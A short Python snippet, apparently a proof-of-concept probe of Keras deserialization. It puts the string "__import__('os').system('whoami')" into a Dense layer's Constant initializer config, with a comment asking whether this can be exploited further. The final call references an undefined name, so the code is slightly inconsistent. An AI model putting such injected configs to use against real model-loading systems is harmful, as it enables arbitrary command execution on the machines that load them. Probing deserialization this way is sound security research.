layer_config = {
"name": "layer_config",
"config": {
"module": "keras.layers",
"class_name": "Dense",
"config": {
"units": 64,
"kernel_initializer": {
"module": "keras.initializers",
"class_name": "Constant",
"config": {
"value": "__import__('os').system('whoami')" # Can we exploit this further?
}
}
}
}
}
# Successfull layer object creation indicates the arguments were correctly parsed.
obj = keras.saving.deserialize_keras_object(direct_injection)